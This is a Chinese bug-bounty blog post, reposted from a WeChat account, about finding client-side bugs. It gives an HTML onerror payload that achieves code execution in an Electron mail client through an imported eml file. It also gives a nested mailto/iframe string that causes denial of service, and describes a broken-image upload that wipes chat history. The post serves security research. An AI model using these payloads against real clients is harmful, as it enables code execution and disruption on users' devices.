src中客户端的挖掘思路

admin 2025年3月16日22:25:10评论24 views字数 784阅读2分36秒阅读模式

开局截图留念一下,报课跟着小火炬师傅学了一个月的情况,报名请联系Linate_song

src中客户端的挖掘思路

正文

写一下最近遇到实战src当中客户端如何可以出一些漏洞

邮件导入点rce

我们iframe访问一下自己的服务器发现是Electron

然后eml的内容改成

<imgsrc=11onerror="require('child_process').exec('calc')">

 base64加密

src中客户端的挖掘思路

导入这个邮件

src中客户端的挖掘思路

拓展2

已知iframe能解析

构造套娃伪协议

mailto:[email protected]?body=%3Ciframe%20src=%22mailto:[email protected]?body=%3Ciframe%20src='mailto:[email protected]?body=%3Ciframe%20src=%22mailto:[email protected]?body=%3Ciframe%20src='mailto:[email protected]?body=%3Ciframe%20src=%22mailto:[email protected]?body=...%22%3E%3C/iframe%3E'%3E%3C/iframe%3E%22'%3E%3C/iframe%3E%22%3E%3C/iframe%3E
然后他就会疯狂的弹出邮件 造成dos

错误的图片解析导致dos

已知这是一个聊天软件

(假装有图片)

他的图片和表情包的引用链接如下

src中客户端的挖掘思路

我们尝试修改这个url

src中客户端的挖掘思路

总之进行大量的fuzz以后发现这个url不可改

限制的非常死 如果不是图片也会报错

总之一个参数不能动

那么好

上传一个错误的图片先让他不能解析

然后他又走了这个上传的流程

所以在这个聊天软件会一直加载这个错误的图片

src中客户端的挖掘思路

因为那个引用限制的太死了,肯定会报错

然后回到聊天框发现

src中客户端的挖掘思路

聊天记录直接因为那个报错被清空

原文始发于微信公众号(秋风的安全之路):src中客户端的挖掘思路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月16日22:25:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   src中客户端的挖掘思路https://cn-sec.com/archives/3838675.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息